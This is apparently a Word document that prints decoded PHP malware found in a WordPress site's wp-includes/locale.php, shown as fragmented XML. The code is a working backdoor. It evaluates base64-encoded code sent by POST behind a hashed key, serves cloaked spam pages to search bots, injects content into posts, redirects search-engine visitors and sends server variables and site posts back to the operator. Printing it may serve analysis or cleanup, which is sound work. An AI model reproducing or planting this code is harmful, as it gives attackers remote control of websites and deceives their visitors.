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24" w:rsidRPr="00317324" w:rsidRDefault="00317324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val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0031732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val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Translation of base64 code in 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  <w:lang w:val="en"/>
        </w:rPr>
        <w:t>\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u w:val="single"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>wp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u w:val="single"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>-includes\</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="0031732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val="en"/>
        </w:rPr>
        <w:t>locale.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00317324" w:rsidRDefault="00317324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error_reporting(0);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define('HASH_KEY', 'f32916fc0e98ad206d51574030eb300f');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_isJson($string)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@json_decode($string);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(!function_exists('json_last_error')) { return true;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(@json_last_error() == JSON_ERROR_NONE);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###BEGIN LICENSE KEY###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_sysTmpDir()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$ini_val = @ini_get('upload_tmp_dir');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$upload_tmp_dir = $ini_val ? $ini_val : @sys_get_temp_dir();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(@is_writable($upload_tmp_dir))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$upload_tmp_dir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$tmp_dir = DIRECTORY_SEPARATOR . "tmp"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(@is_writable($tmp_dir))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$tmp_dir;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(@is_writable("." . DIRECTORY_SEPARATOR))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return "."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_findHomeWP()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$down = realpath(dirname(__FILE__))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for ($i = 0; $i &lt; 30; $i++)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(@is_file($down . "wp-config.php"))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$down;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$down = $down . ".."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_findHomeIndex()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$down = realpath(dirname(__FILE__))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for ($i = 0; $i &lt; 30; $i++)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(@is_file($down . "index.php"))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$down;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$down = $down . ".."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_findHome()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$homewp = @_findHomeWP();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($homewp)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@realpath($homewp . DIRECTORY_SEPARATOR);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$home_path = @_findHomeIndex();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($home_path)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@realpath($home_path . DIRECTORY_SEPARATOR);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_dirWritable()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$d =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$paths = array("wp-content" . $d . "uploads", "wp-content", "upload", "uploads", "temp", "tmp", "images");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$home_path = @_findHome();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($home_path)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(@is_writable($home_path))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$home_path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for ($i = 0; $i &lt; count($paths); $i++)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$check_path = $home_path . DIRECTORY_SEPARATOR . $paths[$i]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(@is_writable($check_path))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return $check_path;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@_sysTmpDir();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@_sysTmpDir();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_getTmpDir()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$tmp_dir = @_dirWritable() . ".cache" . DIRECTORY_SEPARATOR;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(!@is_dir($tmp_dir))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@mkdir($tmp_dir);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(@is_dir($tmp_dir))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$tmp_dir;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_getUri(){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$uri = $_SERVER['REQUEST_URI'];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 strpos($_SERVER['REQUEST_URI'], '?doing_wp_cron=') !== false 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$uri = substr($_SERVER['REQUEST_URI'], 0, strpos($_SERVER['REQUEST_URI'], "?doing_wp_cron="));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$uri;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define('TMP_DIR', @_getTmpDir());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define('REQUEST_URI', @_getUri());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define('PREFIX', '@@@');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define('END_GET', 'END_GET');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define('END_REQ', 'END_REQ');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define('START_GET', 'START_GET');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define('START_REQ', 'START_REQ');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define('START_SYNC', 'START_SYNC');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define('END_SYNC', 'END_SYNC');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define('START_TEXT', 'START_TEXT');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define('END_TEXT', 'END_TEXT');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define('GET_DONE', 'UPDATEDONE');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define('REQ_DONE', 'REQUESTDONE');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define('DEL_DONE', 'DELETEDONE');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define('GET_ERROR', 'UPDATEERROR');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define('REQ_ERROR', 'REQUESTERROR');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define('DEL_ERROR', 'DELETEERROR');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define('ROOT_KEY', '87fae933cea28b48bdd3f4ee3c36a4b9');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define('REQUESTS', @_hostFilename('25b6f3023ec4ee261bbf92444c7263dc'));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define('SETRAFFIC', @_hostFilename('103d01354793f6711f1d168963a7f396'));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define('CACHE_FILES', serialize(array('POSTS_FILE' =&gt; '0ef071d944066d7297c479d9002a9b79', 'PAGES_FILE' =&gt; 'fcec7ef0ba39e095bbc9c46e038f390d', 'AGENTS_FILE' =&gt; '66e95a63905a1afcdafb155e</w:t>
      </w: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>b40ed160', 'ADMINS_FILE' =&gt; '687654de7f0e7325cc4619122f952e31', 'IPBOTS_FILE' =&gt; '1de77179a73132d7b41ba881df66820c', 'REFERERS_FILE' =&gt; 'dc77463f03679ea6f569d928a013d5b2', 'SETTINGS_FILE' =&gt; 'c5e35565804f52b50988b3c3d0e1b38f', 'REDIRECT_FILE' =&gt; '378b91a00db61c6d14cd639e40ebc978', 'REDIRECTS_FILE' =&gt; '5e3151796a37672bedf9b2a98c9c6498')));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foreach (unserialize(CACHE_FILES)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define($key, @_hostFilename($value));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(!array_key_exists('HTTP_USER_AGENT', $_SERVER))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$_SERVER['HTTP_USER_AGENT'] = '';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(!array_key_exists('REMOTE_ADDR', $_SERVER))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$_SERVER['REMOTE_ADDR'] = '';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(!array_key_exists('HTTP_REFERER', $_SERVER))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$_SERVER['HTTP_REFERER'] = '';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(!array_key_exists('HTTP_REFERER', $_SERVER))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$_SERVER['HTTP_REFERER'] = '';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(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))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$_SERVER["REMOTE_ADDR"] = $_SERVER["HTTP_X_FORWARDED_FOR"];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_getIpAddress()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foreach (array('HTTP_CLIENT_IP',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'HTTP_X_FORWARDED_FOR',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'HTTP_X_FORWARDED',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'HTTP_X_CLUSTER_CLIENT_IP',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'HTTP_FORWARDED_FOR',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'HTTP_FORWARDED',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'REMOTE_ADDR') as $key)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(array_key_exists($key, $_SERVER) === true)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foreach (explode(',', $_SERVER[$key]) as $IPaddress)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$IPaddress = trim($IPaddress);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return $IPaddress;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'0.0.0.0';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_isBotAgent($ua)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$cache = unserialize(CACHE_AGENTS);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$ua = strtolower($ua);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$uaBlack = $cache-&gt;{'black'};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$uaList = $cache-&gt;{'uabots'};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foreach ($uaBlack as $iua)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$iua = strtolower($iua);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(strpos($ua, $iua) || $ua == $iua)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foreach ($uaList as $iua)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$iua = strtolower($iua);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(strpos($ua, $iua) || $ua == $iua)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_getIpRange($ip)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$parts = explode('.', $ip);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$ipMin = $ipMax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foreach ($parts as $part)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($part == '*')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$ipMin[] = 0;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$ipMax[] = 255;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continue;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(stristr($part, '-'))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$split = explode('-', $part);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$ipMin[] = $split[0];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$ipMax[] = $split[1];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$ipMin[] = $part;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$ipMax[] = $part;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array(join('.', $ipMin), join('.', $ipMax));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_isBotIp($ip)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($ip == "")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$ipList = unserialize(CACHE_IPBOTS);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(!$ipList)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$longIp = ip2long($ip);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$found =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foreach ($ipList as $ipMask)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$ipMask = trim($ipMask);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(stristr($ipMask, '-') !== false || stristr($ipMask, '*') !== false)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list($ipMaskMin, $ipMaskMax) = _getIpRange($ipMask);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$longIpMaskMin = ip2long($ipMaskMin);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$longIpMaskMax = ip2long($ipMaskMax);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($longIp &gt;= $longIpMaskMin &amp;&amp; $longIp &lt;= $longIpMaskMax)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$found =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break;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($ip == $ipMask)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$found =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break;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$found;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_getHost()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$out_host = REQUESTS;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($_SERVER["HTTP_HOST"] != "")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$out_host = $_SERVER["HTTP_HOST"];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elseif ($_SERVER["SERVER_NAME"] != "")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$out_host = $_SERVER["SERVER_NAME"];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(substr($out_host, 0, 4) === "www.")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$out_host = substr($out_host, 4);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$out_host;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_hostFilename($filename)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$filehash = @md5(HASH_KEY . $filename . @_getHost());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$filehash;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_getServInfo()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$data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$data['version'] = phpversion();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$data['_server'] = $_SERVER;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$data;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_readFile($filename)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$filename))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$content = implode("", file(TMP_DIR . $filename));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$content;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_writeFile($filename, $data)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$fp = fopen(TMP_DIR . $filename, 'w+');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fwrite($fp, @base64_encode($data));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fclose($fp);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_deleteFile($filename)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$filename))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unlink(TMP_DIR . $filename);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_addRequest($request)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($request == '/index.php')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$request = '/';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$reqs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REQUESTS))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$reqs_json = @base64_decode(@_readFile(REQUESTS));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($reqs_json != "null" &amp;&amp; @_isJson($reqs_json) &amp;&amp; $reqs_json != "")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$reqs = @json_decode($reqs_json, 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if (array_key_exists($request, $reqs))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$cplus = $reqs[$request] + 1;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$cplus = 1;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$reqs = array_merge($reqs, array($request =&gt; $cplus));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@_writeFile(REQUESTS, @json_encode($reqs));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_addSETraffic($request)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$reqs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SETRAFFIC))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$reqs_json = @base64_decode(@_readFile(SETRAFFIC));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($reqs_json != "null" &amp;&amp; @_isJson($reqs_json) &amp;&amp; $reqs_json != "")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$reqs = @json_decode($reqs_json, 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$data = array('time' =&gt; time(), 'request' =&gt; $request, 'ip' =&gt; @_getIpAddress(), 'referer' =&gt; $_SERVER["HTTP_REFERER"], 'agent' =&gt; $_SERVER['HTTP_USER_AGENT']);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array_push($reqs, $data);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@_writeFile(SETRAFFIC, @json_encode($reqs));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_addFilters($content)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 global $post;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$cache_posts = unserialize(CACHE_POSTS);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($cache_posts)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(in_array($post-&gt;ID, $cache_posts))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$cache_post = @_cachePost($post-&gt;ID);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($cache_post)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if ($cache_post-&gt;content &amp;&amp; function_exists('wpautop'))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$content = wpautop($cache_post-&gt;content);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if ($cache_post-&gt;header)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$content = $cache_post-&gt;header . $content;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if ($cache_post-&gt;footer)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$content = $content . $cache_post-&gt;footer;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$content;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_getRequests()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REQUESTS))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$reqs = @base64_decode(@_readFile(REQUESTS));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$result = array('requests' =&gt; @json_decode($reqs));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@_writeFile(REQUESTS, '');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$result;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_get_wp_posts()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$posts_arr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(isset($_POST['get_posts']) &amp;&amp; function_exists('get_posts') &amp;&amp; function_exists('get_pages') &amp;&amp; function_exists('get_permalink'))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$accept_info = array('post_date', 'post_title', 'filter', 'post_type');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$accept_all =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$args = array(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'posts_per_page' =&gt; 10000,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'offset' =&gt; 0,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'category'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'category_name'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'orderby' =&gt; 'date',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'order' =&gt; 'DESC',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'include'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'exclude'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'meta_key'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'meta_value'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'post_type' =&gt; 'post',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'post_mime_type'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'post_parent'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'author' =&gt; '',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'post_status' =&gt; 'publish',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'suppress_filters' =&gt; true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$new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$posts_array = get_posts($args);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$posts_array = array_merge($posts_array, get_pages());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foreach ($posts_array as $post_to_show)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foreach ($post_to_show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if ($key == 'ID')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            $new['id'] = $value;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$path = get_permalink($value);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if ($path != "")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$parse = parse_url($path);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if (isset($parse['query'])){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$new['path'] = $parse['path'].'?'.$parse['query'];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$new['path'] = $parse['path'];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$new['path'] =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if (in_array($key, $accept_info) || $accept_all || $key == 'post_content')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if ($key == 'post_content')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$new['post_content_count'] = strlen($value);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$new[$key] = $value;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($new['post_content_count'] &gt; 0)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array_push($posts_arr, $new);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array('wp_posts' =&gt; $posts_arr);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_getSETraffic()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SETRAFFIC))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$reqs = @base64_decode(@_readFile(SETRAFFIC));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$result = array('setraffic' =&gt; @json_decode($reqs));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@_writeFile(SETRAFFIC, '');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$result;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$result = array('setraffic' =&gt; false);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$result;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_addPage($page)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PAGES_FILE))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$pages_json = @base64_decode(@_readFile(PAGES_FILE));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($pages_json != 'null' &amp;&amp; @_isJson($pages_json))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$pages = @json_decode($pages_json, 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(!in_array($page, $pages, true))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array_push($pages, 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@_writeFile(PAGES_FILE, @json_encode($pages));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_getPost($post_id){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$content = get_post(intval($post_id));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echo PREFIX . START_TEXT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echo @base64_encode(@json_encode(array('content' =&gt; $content-&gt;post_content)));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echo PREFIX . END_TEXT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_addPost($page)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POSTS_FILE))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$pages_json = @base64_decode(@_readFile(POSTS_FILE));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($pages_json != 'null' &amp;&amp; @_isJson($pages_json))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$pages = @json_decode($pages_json, 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(!in_array($page, $pages, true))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array_push($pages, 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@_writeFile(POSTS_FILE, @json_encode($pages));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_addRedirect($page)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REDIRECTS_FILE))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$pages_json = @base64_decode(@_readFile(REDIRECTS_FILE));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if ($pages_json != 'null' &amp;&amp; @_isJson($pages_json))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$pages = @json_decode($pages_json, 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(!in_array($page, $pages, true))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array_push($pages, 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@_writeFile(REDIRECTS_FILE, @json_encode($pages));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_delPage($page)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PAGES_FILE))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$pages_json = @base64_decode(@_readFile(PAGES_FILE));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($pages_json != 'null' &amp;&amp; @_isJson($pages_json))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$pages = @json_decode($pages_json, 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(($pos = array_search($page, $pages)) !== false)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unset($pages[$pos]);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$_pages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foreach ($pages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array_push($_pages, $value);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@_writeFile(PAGES_FILE, @json_encode($_pages));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_delPost($page)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POSTS_FILE))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$pages_json = @base64_decode(@_readFile(POSTS_FILE));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($pages_json != 'null' &amp;&amp; @_isJson($pages_json))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$pages = @json_decode($pages_json, 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(($pos = array_search($page, $pages)) !== false)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unset($pages[$pos]);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$_pages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foreach ($pages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array_push($_pages, $value);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@_writeFile(POSTS_FILE, @json_encode($_pages));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_delRedirect($page)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REDIRECTS_FILE))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$pages_json = @base64_decode(@_readFile(REDIRECTS_FILE));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($pages_json != 'null' &amp;&amp; @_isJson($pages_json))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$pages = @json_decode($pages_json, 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(($pos = array_search($page, $pages)) !== false)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unset($pages[$pos]);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$_pages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foreach ($pages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array_push($_pages, $value);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@_writeFile(REDIRECTS_FILE, @json_encode($_pages));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_cacheFiles()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foreach (unserialize(CACHE_FILES)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(!file_exists(TMP_DIR . @_hostFilename($value)))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_cacheSave($cache)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($cache-&gt;{'action'} == 'update')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($cache-&gt;{'install'} == 'files')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@_writeFile(PAGES_FILE, @json_encode($cache-&gt;{'pages'}));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@_writeFile(POSTS_FILE, @json_encode($cache-&gt;{'posts'}));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@_writeFile(REDIRECTS_FILE, @json_encode($cache-&gt;{'redirects'}));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@_writeFile(AGENTS_FILE, @json_encode($cache-&gt;{'agents'}));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@_writeFile(ADMINS_FILE, @json_encode($cache-&gt;{'admins'}));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@_writeFile(IPBOTS_FILE, @json_encode($cache-&gt;{'ipbots'}));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@_writeFile(REFERERS_FILE, @json_encode($cache-&gt;{'referers'}));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@_writeFile(SETTINGS_FILE, @json_encode($cache-&gt;{'settings'}));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@_writeFile(REDIRECT_FILE, @json_encode($cache-&gt;{'redirect'}));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_cacheSavePage($page, $body, $headers = false)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$filename = @md5($page);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$arrdata['headers'] = $headers;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$arrdata['body'] = $body;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$json_data = @json_encode($arrdata);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@_writeFile($filename, $json_data);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@_addPage($page);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$filename))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_cacheSavePost($post, $header, $content, $footer)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$filename = @md5($post);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$arrdata['header'] = $header;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$arrdata['content'] = $content;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$arrdata['footer'] = $footer;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$json_data = @json_encode($arrdata);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@_writeFile($filename, $json_data);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@_addPost($post);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$filename))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_cacheSaveRedirect($name, $body, $headers = false)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$filename = @md5($name);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$arrdata['headers'] = $headers;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$arrdata['body'] = $body;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$json_data = @json_encode($arrdata);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@_writeFile($filename, $json_data);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@_addRedirect($name);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(file_exists(TMP_DIR . $filename))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_cacheDeletePage($page)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$filename = @md5($page);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@_deleteFile($filename);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@_delPage($page);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(!file_exists(TMP_DIR . $filename))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_cacheDeletePost($post)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$filename = @md5($post);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@_deleteFile($filename);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@_delPost($post);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(!file_exists(TMP_DIR . $filename))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_cacheDeleteRedirect($page)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$filename = @md5($page);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@_deleteFile($filename);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@_delRedirect($page);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(!file_exists(TMP_DIR . $filename))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_cacheLoad($install = false)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(!file_exists(TMP_DIR . SETTINGS_FILE) || $install || !@_cacheFiles())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$cache = (object)array();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$cache-&gt;{'action'} = 'update';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$cache-&gt;{'install'} = 'files';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$cache-&gt;{'settings'} = array('active' =&gt; true, 'cloaking' =&gt; false, 'cookie-cloaking' =&gt; false);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@_cacheSave($cache);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(@_cacheFiles())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define('CACHE_PAGES', serialize(@json_decode(@base64_decode(@_readFile(PAGES_FILE)))));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define('CACHE_POSTS', serialize(@json_decode(@base64_decode(@_readFile(POSTS_FILE)))));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define('CACHE_AGENTS', serialize(@json_decode(@base64_decode(@_readFile(AGENTS_FILE)))));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define('CACHE_ADMINS', serialize(@json_decode(@base64_decode(@_readFile(ADMINS_FILE)))));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define('CACHE_IPBOTS', serialize(@json_decode(@base64_decode(@_readFile(IPBOTS_FILE)))));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define('CACHE_REFERERS', serialize(@json_decode(@base64_decode(@_readFile(REFERERS_FILE)))));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define('CACHE_SETTINGS', serialize(@json_decode(@base64_decode(@_readFile(SETTINGS_FILE)))));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define('CACHE_REDIRECT', serialize(@json_decode(@base64_decode(@_readFile(REDIRECT_FILE)))));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define('CACHE_REDIRECTS', serialize(@json_decode(@base64_decode(@_readFile(REDIRECTS_FILE)))));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_cachePage($page)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$rfile = _readFile(@md5($page));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($rfile)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$page_cache = @json_decode(@base64_decode($rfile));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$page_cache;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@_cacheLoad(true);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_cachePost($page)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$rfile = _readFile(@md5($page));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($rfile)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$page_cache = @json_decode(@base64_decode($rfile));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$page_cache;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@_cacheLoad(true);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_cacheRedirect($page)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$rfile = _readFile(@md5($page));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($rfile)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$page_cache = @json_decode(@base64_decode($rfile));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$page_cache;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@_cacheLoad(true);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_cacheGet($cache)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@_addRequest(REQUEST_URI);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$result =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$cache = @base64_decode($cache);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(@_isJson($cache))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$cache = @json_decode($cache);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$result = @_cacheSave($cache);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($result)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echo PREFIX . START_GET . PREFIX . GET_DONE . PREFIX . END_GET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echo PREFIX . START_GET . PREFIX . GET_ERROR . PREFIX . END_GET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_syncPage($cache)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$get_cache = @base64_decode($cache);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(@_isJson($get_cache))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$json_cache = @json_decode($get_cache);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($json_cache-&gt;{'action'} == 'request')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$result = @_cacheSavePage($json_cache-&gt;{'page'}, $json_cache-&gt;{'body'}, $json_cache-&gt;{'headers'});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($result)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        echo PREFIX . START_REQ . PREFIX . REQ_DONE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REQ_ERROR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 elseif ($json_cache-&gt;{'action'} == 'delete')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$result = @_cacheDeletePage($json_cache-&gt;{'page'});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($result)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DEL_DONE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DEL_ERROR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_syncPost($cache)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$get_cache = @base64_decode($cache);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(@_isJson($get_cache))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$json_cache = @json_decode($get_cache);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($json_cache-&gt;{'action'} == 'request')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$result = @_cacheSavePost($json_cache-&gt;{'post'}, $json_cache-&gt;{'header'}, $json_cache-&gt;{'content'}, $json_cache-&gt;{'footer'});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($result)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REQ_DONE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REQ_ERROR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 elseif ($json_cache-&gt;{'action'} == 'delete')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$result = @_cacheDeletePost($json_cache-&gt;{'post'});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($result)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DEL_DONE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DEL_ERROR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_syncRedirect($cache)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$get_cache = @base64_decode($cache);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(@_isJson($get_cache))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$json_cache = @json_decode($get_cache);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($json_cache-&gt;{'action'} == 'redirect')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    $result = @_cacheSaveRedirect($json_cache-&gt;{'name'}, $json_cache-&gt;{'html'}, $json_cache-&gt;{'headers'});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($result)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REQ_DONE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REQ_ERROR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 elseif ($json_cache-&gt;{'action'} == 'delete')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$result = @_cacheDeleteRedirect($json_cache-&gt;{'name'});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($result)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DEL_DONE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echo PREFIX . START_REQ . PREFIX . DEL_ERROR . PREFIX . END_REQ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_showPage($page)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$showpage = @_cachePage($page);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($showpage)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$body = $showpage-&gt;{'body'};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$headers = $showpage-&gt;{'headers'};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($headers)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foreach ($headers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@header($key . ": " . $value);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echo $body;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_showRedirect($page)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$showpage = @_cacheRedirect($page);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($showpage)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$body = $showpage-&gt;{'body'};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$headers = $showpage-&gt;{'headers'};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($headers)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$headers = @json_decode($headers);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foreach ($headers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@header($key . ": " . $value);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echo $body;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_syncCache()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_getRequests());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_get_wp_posts());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_getSETraffic());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array('pages' =&gt; unserialize(CACHE_PAGES)));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array('posts' =&gt; unserialize(CACHE_POSTS)));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array('agents' =&gt; unserialize(CACHE_AGENTS)));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array('admins' =&gt; unserialize(CACHE_ADMINS)));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array('ipbots' =&gt; unserialize(CACHE_IPBOTS)));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array('referers' =&gt; unserialize(CACHE_REFERERS)));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array('settings' =&gt; unserialize(CACHE_SETTINGS)));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array('redirect' =&gt; unserialize(CACHE_REDIRECT)));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array('redirects' =&gt; unserialize(CACHE_REDIRECTS)));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$arrsync = array_merge($arrsync, array('server_info' =&gt; @_getServInfo()));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echo PREFIX . START_SYNC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echo @base64_encode(@json_encode($arrsync));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echo PREFIX . END_SYNC . PREFIX;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_isAuth()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(@md5($_POST["root_key"]) == ROOT_KEY)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(@md5($_POST["hash_key"]) == HASH_KEY)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_isAdminCookie()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$cache_admins = unserialize(CACHE_ADMINS);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foreach ($_COOKIE as $key =&gt; $value)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foreach ($cache_admins as $cookie)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    if (strrpos($key, $cookie, -strlen($key)) !== FALSE)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_isTraffic()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$_referer = $_SERVER["HTTP_REFERER"];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($_referer == "")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$pref = parse_url($_referer);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$_ses = unserialize(CACHE_REFERERS);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$one_host = strrev(strtolower($pref['host']));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$exp_one = explode('.', $one_host);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$one_host = strrev($exp_one[1]);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$two_host = strrev($exp_one[2]);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(in_array($one_host, $_ses) || in_array($two_host, $_ses))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true;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_goRedirect($request)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$redirect = unserialize(CACHE_REDIRECT);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($redirect-&gt;{'action'} == 'redirect')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(in_array($request, $redirect-&gt;{'pages'}))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@_showRedirect($redirect-&gt;{'return'});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($redirect-&gt;{'action'} == 'show')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echo $redirect-&gt;{'return'};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($redirect-&gt;{'action'} == '301')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@header("Location: " . $redirect-&gt;{'return'});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return false;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(isset($_POST["code"]) &amp;&amp; @_isAuth())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@eval(@base64_decode($_POST["code"]));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 (!ini_get('safe_mode') &amp;&amp; function_exists('json_decode') &amp;&amp; TMP_DIR)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if (@_cacheLoad())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$cache_pages = unserialize(CACHE_PAGES);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$cache_settings = unserialize(CACHE_SETTINGS);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$cache_redirect = unserialize(CACHE_REDIRECT);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(isset($_POST["sync_redirect"]) &amp;&amp; @_isAuth())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@_syncRedirect($_POST['sync_redirect']);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(isset($_POST["sync_cache"]) &amp;&amp; @_isAuth())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@_cacheGet($_POST['cache_get']);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@_syncCache();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(isset($_POST["sync_page"]) &amp;&amp; @_isAuth())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@_syncPage($_POST['sync_page']);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(isset($_POST["sync_post"]) &amp;&amp; @_isAuth())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@_syncPost($_POST['sync_post']);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(isset($_POST["get_post"]) &amp;&amp; @_isAuth())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@_getPost($_POST['get_post']);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die;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if (!@_isAdminCookie())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if (@$cache_settings-&gt;{'active'} == 'true')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@_addRequest(REQUEST_URI);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if (@in_array(REQUEST_URI, $cache_pages))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if (@$cache_settings-&gt;{'cloaking'} == 'true')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if (@_isBotIp(@_getIpAddress()) || @_isBotAgent($_SERVER['HTTP_USER_AGENT']))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@_showPage(REQUEST_URI);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} elseif (@$cache_settings-&gt;{'cookie-cloaking'} == 'true')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if (count($_COOKIE) == 0)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@_showPage(REQUEST_URI);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            } else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if (@$cache_redirect-&gt;{'action'} != 'true')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@_showPage(REQUEST_URI);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if (function_exists('add_filter')){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add_filter('the_content', '_addFilters');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if (@_isTraffic()) {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@_addSETraffic(REQUEST_URI);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@_goRedirect(REQUEST_URI);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296D23" w:rsidRPr="00296D23" w:rsidRDefault="00296D23" w:rsidP="0029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A33FBF" w:rsidRPr="00296D23" w:rsidRDefault="00296D23" w:rsidP="00296D23">
      <w:r w:rsidRPr="00296D23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sectPr w:rsidR="00A33FBF" w:rsidRPr="00296D23" w:rsidSect="00317324">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1008" w:bottom="720" w:left="1008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55"/>
    <w:rsid w:val="00000D8E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D1"/>
    <w:rsid w:val="000B2438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3DAF"/>
    <w:rsid w:val="0023406E"/>
    <w:rsid w:val="002343AE"/>
    <w:rsid w:val="00234903"/>
    <w:rsid w:val="00234CDE"/>
    <w:rsid w:val="00236D97"/>
    <w:rsid w:val="002371BD"/>
    <w:rsid w:val="00237A4E"/>
    <w:rsid w:val="00237A69"/>
    <w:rsid w:val="00237DB3"/>
    <w:rsid w:val="002402C4"/>
    <w:rsid w:val="00240CE2"/>
    <w:rsid w:val="00241431"/>
    <w:rsid w:val="00241C3F"/>
    <w:rsid w:val="002420FD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96D23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5E3"/>
    <w:rsid w:val="00315948"/>
    <w:rsid w:val="00315B27"/>
    <w:rsid w:val="00316535"/>
    <w:rsid w:val="00316924"/>
    <w:rsid w:val="00317096"/>
    <w:rsid w:val="00317324"/>
    <w:rsid w:val="003175CD"/>
    <w:rsid w:val="00317746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306D"/>
    <w:rsid w:val="004630A4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BFB"/>
    <w:rsid w:val="00492E2F"/>
    <w:rsid w:val="004936D7"/>
    <w:rsid w:val="004938E9"/>
    <w:rsid w:val="00493D8B"/>
    <w:rsid w:val="0049452D"/>
    <w:rsid w:val="00494793"/>
    <w:rsid w:val="00494EC8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CFE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41AE"/>
    <w:rsid w:val="004E4F50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6E81"/>
    <w:rsid w:val="008D6E8F"/>
    <w:rsid w:val="008D745B"/>
    <w:rsid w:val="008D7D41"/>
    <w:rsid w:val="008E032B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A97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04A"/>
    <w:rsid w:val="00D362B1"/>
    <w:rsid w:val="00D3696C"/>
    <w:rsid w:val="00D4009D"/>
    <w:rsid w:val="00D400E7"/>
    <w:rsid w:val="00D40578"/>
    <w:rsid w:val="00D40581"/>
    <w:rsid w:val="00D405A7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3D90"/>
    <w:rsid w:val="00D7433F"/>
    <w:rsid w:val="00D746DE"/>
    <w:rsid w:val="00D7583B"/>
    <w:rsid w:val="00D7640D"/>
    <w:rsid w:val="00D77270"/>
    <w:rsid w:val="00D80BC3"/>
    <w:rsid w:val="00D81F76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718C"/>
    <w:rsid w:val="00E6780F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5E0"/>
    <w:rsid w:val="00F175E5"/>
    <w:rsid w:val="00F17E4D"/>
    <w:rsid w:val="00F2033C"/>
    <w:rsid w:val="00F20517"/>
    <w:rsid w:val="00F20589"/>
    <w:rsid w:val="00F20996"/>
    <w:rsid w:val="00F20E4C"/>
    <w:rsid w:val="00F20ED0"/>
    <w:rsid w:val="00F213F6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A0A"/>
    <w:rsid w:val="00F51C1E"/>
    <w:rsid w:val="00F51DD9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C89"/>
    <w:rsid w:val="00FA0CE2"/>
    <w:rsid w:val="00FA0E44"/>
    <w:rsid w:val="00FA1527"/>
    <w:rsid w:val="00FA1F75"/>
    <w:rsid w:val="00FA2247"/>
    <w:rsid w:val="00FA2B58"/>
    <w:rsid w:val="00FA32B1"/>
    <w:rsid w:val="00FA33D8"/>
    <w:rsid w:val="00FA3A34"/>
    <w:rsid w:val="00FA46E5"/>
    <w:rsid w:val="00FA4B52"/>
    <w:rsid w:val="00FA4D34"/>
    <w:rsid w:val="00FA5402"/>
    <w:rsid w:val="00FA6F55"/>
    <w:rsid w:val="00FA779C"/>
    <w:rsid w:val="00FA77F9"/>
    <w:rsid w:val="00FA7DBA"/>
    <w:rsid w:val="00FB041E"/>
    <w:rsid w:val="00FB111A"/>
    <w:rsid w:val="00FB1739"/>
    <w:rsid w:val="00FB1D48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CE5"/>
    <w:rsid w:val="00FC0820"/>
    <w:rsid w:val="00FC128C"/>
    <w:rsid w:val="00FC15C1"/>
    <w:rsid w:val="00FC1B63"/>
    <w:rsid w:val="00FC20F0"/>
    <w:rsid w:val="00FC35B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E3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04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3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23</Pages>
  <Words>4498</Words>
  <Characters>25644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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-09-07T16:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-09-08T20:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>